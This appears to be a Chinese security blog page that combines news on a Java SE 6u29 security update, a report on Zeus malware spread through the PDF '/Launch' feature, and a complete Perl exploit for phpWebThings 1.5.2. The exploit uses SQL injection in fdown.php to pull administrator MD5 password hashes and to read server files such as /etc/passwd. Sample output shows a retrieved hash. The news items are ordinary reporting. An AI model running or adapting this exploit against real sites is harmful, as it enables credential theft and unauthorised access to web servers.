阳光男孩

Java SE 是Java平台标准版的简称(Java Platform, Standard Edition) (also known as Java 2 Platform) ，用于开发和部署桌面、服务器以及嵌入设备和实时环境中的Java应用程序。Java SE包括用于开发Java Web服务的类库，同时，Java SE为Java EE提供了基础。Java SE(Java Platform, Standard Edition，Java标准版)就是基于JDK和JRE的。
Java是目前所有编程语言中最流行、发展最快的语言之一，随着Java SE 6.0的发布，Java也变得更加强大和易用。
Java SE 6 的第 29 个更新版本发布了，该版本修复了一些关键的bug. 此更新的完整版本的内部版本是1.6.0_29-b11(其中“B”代表“Build”)。外部版本号是6u29。
安全基准：

针对此次版本，发布的重要补丁更新包涵盖了20个Oracle Java SE新增的安全漏洞。其中19个漏洞在未经许可的情况下可以远程操控，比如在无需用户名和密码的情况下就可以远程登录。

至于部署方面的问题，只有在JDK和JRE7、JRE6中才能修复部署方面的漏洞。用户在最新的JDK以及JRE7或者JRE 6中，应该使用默认的Java插件和Java Web Start。
官网详细说明：http://www.oracle.com/technetwork/java/javase/6u29-relnotes-507960.html
下载地址：http://www.oracle.com/technetwork/java/javase/tzdata-versions-138805.html

北京时间6月6日，据国外媒体报道，日前，Oracle公司发布了一则关于对Java SE平台进行漏洞修补的通知，在通知中，该公司声明，即将在6月7日发布的安全更新修复了SE平台中的17个安全漏洞，包括大量被列为“严重”等级的漏洞，这些漏洞在CVSS的漏洞评分中为10分，即最严重风险。这些漏洞可以让攻击者在用户毫无察觉的情况下远程执行代码。

受影响的产品包括Windows，Linux，和Solaris对应的JDK和JRE6和5.0，以及JRE和SDK1.4.2_31和早期发布的版本。Oracle强烈建议用户安装该更新，以修复漏洞。

另外，Oracle在近期公布了Java平台计划。上周公司宣布其JavaFX 2.0平台已经进入到测试阶段。该公司还发布了Java开发和维护计划。

利用先前安全研究员揭露的合法“/Launch”指令，搭配社交工程手法的攻击出现了，攻击者将其用来传递Zeus恶意程序。

4月初，国外媒体报导了安全研究员Dider Stevens和Jeremy Conway揭露了利用PDF合法漏洞的攻击手法，并称其可能成为未来PDF安全上的一大威胁。果不其然，现在利用此一手法的攻击已经出现了。

安全厂商Websense的负责人Dan Hubbard日前公开表示，他已经发现黑客开始利用“/Launch”指令，通过合法的方式搭配社交工程掩护，攻击使用者的事件。其手法正好和 Stevens和Conway所揭露的方式如出一辙。

两位安全研究员所揭露的手法是这样的，3月底，Dider Stevens证实了，可以透过PDF合法的“/Launch”指令，让PDF文件在开启的时候，自动去执行任何应用程序。虽然多数的PDF阅读软件，都 会跳出警告，但是警告的文字内容，也可以被攻击者更改，这使得攻击者可以透过社交工程的方式，诱骗使用者打开应用程序。

4月初，Jeremy Conway利用这个方法，证明了攻击者可以通过被植入“/Launch”指令程序代码的PDF文件，让另一个健康的PDF文件被植入程序代码，在PDF 阅读软件没有允许Java Script可以执行的状况下，让使用者只要点击被植入了程序代码的PDF文件，并且被社交工程手法诱骗去点选开启程序时，就自动连线到攻击者指定的网 站。这和过去通过PDF夹带Java Script的手法完全不同，可以利用完全合法的手段让使用者连上恶意网站。因为是合法的手段，这代表着在这过程中，几乎没有任何杀毒软件会发出警告。

现在，网络上已经有攻击者开始利用这个手法，散布知名的僵尸网络恶意程序Zeus的变种。Zeus是一个臭名昭彰的恶意程序，拥有许多变种，被 感染的电脑会被攻击者利用，成为僵尸电脑。攻击者会寄送一封夹带有Royal_Mail_Delivery_Notice.PDF文件的电子邮件，只要使 用者执行该PDF文件，并且允许后续动作的话，就会在使用者的电脑中植入恶意程序Zeus。不过此手法最终还是利用Java Script来连到恶意网站，只要使用者关闭了Java Script执行的功能就可以避免危险。

Adobe的软件是现在人们使用最多的PDF阅读软件。目前，Adobe还没有将这个漏洞修复，先前推出的大规模更新，也没有针对此漏洞进行修 正，取而代之的是要求使用者关闭PDF阅读软件中，开启第三方应用程序的功能，藉此阻挡“/Launch”功能。

 phpWebThings <= 1.5.2 MD5 Hash恢复/文件公开远程漏洞
注：
1，无论php.ini如何设置此漏洞都有效；
2，wt_config.php 包含mysql登录
简要说明：
phpWebThings包括一个可以让攻击者执行SQL注入攻击的缺陷。此问题由于fdown.php脚本未能恰当的处理用户提供输入的”id”变量引起。而这将可能允许攻击者注入或者执行后台数据库SQL请求。

#!/usr/bin/perl
                                                                                    
###################################################################################################
# phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Remote Exploit                        #
#                                                                                                 #
# by staker                                                                                       #
# ——————————                                                                  #
# mail: staker[at]hotmail[dot]it                                                                  #
# url: http://phpwebthings.nl                                                                     #
# ——————————                                                                  #
#                                                                                                 #                        
# NOTE:                                                                                           #
# 1. it works regardless of php.ini settings                                                      #
# 2. wt_config.php contains mysql login                                                           #
#                                                                                                 #
# short explanation:                                                                              #
# —————————————————-                                            #
# phpWebThings contains a flaw that allows an attacker                                            #
# to carry out an SQL injection attack. The issue is                                              #
# due to the fdown.php script not properly sanitizing                                             #
# user-supplied input to the ‘id’ variable. This may                                              #
# allow an attacker to inject or manipulate                                                       #
# SQL queries in the backend database (php.ini indep)                                             #
# —————————————————-                                            #
#                                                                                                 #
# [file: fdown.php]                                                                               #
# ————————————                                                            #
#                                                                                                 #
# <?php                                                                                           #
# include_once(“core/main.php”);                                                                  #
#                                                                                                 #
# $ret = db_query(“select file from {$config["prefix"]}_forum_msgs where cod={$_REQUEST["id"]}”); #
# $row = db_fetch_array($ret);                                                                    #
# header(‘HTTP/1.1 200 OK’);                                                                      #
# header(‘Date: ‘ . date(“D M j G:i:s T Y”));                                                     #
# header(‘Last-Modified: ‘ . date(“D M j G:i:s T Y”));                                            #
# header(“Content-Type: application/force-download”);                                             #
# header(“Content-Lenght: ” . (string)(filesize(“var/forumfiles/{$row["file"]}”)));               #
# header(“Content-Transfer-Encoding: Binary”);                                                    #
# header(“Content-Disposition: attachment; filename={$row["file"]}”);                             #
# readfile(“var/forumfiles/{$row["file"]}”);                                                      #
#                                                                                                 #
# ?>                                                                                              #
#                                                                                                 #
# ————————————-                                                           #
#                                                                                                 #
# yeat@snippet:~/Desktop$ perl a.pl localhost/cms -c 1                                            #
# [*--------------------------------------------------------------------*]                        #
# [* phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Exploit  *]                        #
# [*--------------------------------------------------------------------*]                        #
# [* Usage: perl web.pl [target + path] [OPTIONS]                       *]                        #
# [*                                                                    *]                        #
# [* Options:                                                           *]                        #
# [* [files] -d ../../../../../../etc/passwd                            *]                        #
# [* [hash.] -c user_id                                                 *]                        #
# [* [table] -t set a table prefix (default: wt)                        *]                        #
# [*--------------------------------------------------------------------*]                        #
# [* MD5 Hash: f2c79ad3d1f03ba266dc0a85e1266671                                                   #
#                                                                                                 #
# ----------------------------------------------------------                                      #
# Today is: 12 June 2009                                                                          #
# Location: Italy,Turin.                                                                          #  
# http://www.youtube.com/watch?v=E78BGajeuAI&feature=related                                      #
# ----------------------------------------------------------                                      #
###################################################################################################

use LWP::UserAgent;
use Getopt::Long;

&phpWebThings::init;

my ($files,$admin,$ua_lib,$domain,$table);

$domain  = $ARGV[0] || exit(0);

$ua_lib = LWP::UserAgent->new(
                               timeout      => 5,
                               max_redirect => 0,
                               agent        => ‘Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)’,
                             ) || die $!;  

GetOptions(
           ‘p=s’ => \$proxy,
           ‘d=s’ => \$files,
           ‘c=i’ => \$admin,
           ‘t=s’ => \$table,
         );
        

die(&phpWebThings::Exploit);
  

sub phpWebThings::Exploit()
{
       return Disclose::File($files) if defined $files;
       return Retrieve::Hash($admin) if defined $admin;
}      
              
      
sub Disclose::File
{
      my $filename = $_[0] || die $!;
      
      my $keywords = “\x2F\x66\x64\x6F\x77\x6E\x2E\x70\x68\x70″;
      
      my $response = $ua_lib->post(parse::URL($domain.$keywords),
                     [ id => "1/**/union/**/select/**/0x".Hex::convert($filename)."#" ]);
      
      if ($response->status_line =~ /^(302|200|301)/) {
            return $response->content;
      }
      else {
            return $response->as_string;
      }            
}
      
sub Retrieve::Hash()
{
       my $user_id = $_[0] || die $!;
        
       my $keywords = “\x2F\x66\x64\x6F\x77\x6E\x2E\x70\x68\x70″;
      
       my $prefix = (defined $table) ? $table : ‘wt’;
            
       my $response = $ua_lib->post(parse::URL($domain.$keywords),
                     [ id => "1 UNION Select password FROM ${prefix}_users Where uid=$user_id#" ]);    
      
      if ($response->status_line =~ /^(302|200|301)/)
      {
            if ($response->content =~ /([0-9a-f]{32})/) {
                  return “[* MD5 Hash: $1\n";
            }        
      }
      else {
            return $response->as_string;
      }                          
}
          

sub Hex::convert()
{
       my $string = shift @_ || die $!;
      
       return unpack("H*",$string);
}      
        
      
sub parse::URL()
{
        my $string = shift @_ || die($!);
        
        if ($string !~ /^http:\/\/?/i) {
                $string = 'http://'.$string;
        }
        
        return $string;

}

sub phpWebThings::init
{
       print  "[*--------------------------------------------------------------------*]\n”.
              ”[* phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Exploit  *]\n”.
              ”[*--------------------------------------------------------------------*]\n”.
              ”[* Usage: perl web.pl [target + path] [OPTIONS]                       *]\n”.
              ”[*                                                                    *]\n”.
              ”[* Options:                                                           *]\n”.
              ”[* [files] -d ../../../../../../etc/passwd                            *]\n”.
              ”[* [hash.] -c user_id                                                 *]\n”.
              ”[* [table] -t set a table prefix (default: wt)                        *]\n”.
              ”[*--------------------------------------------------------------------*]\n”;
}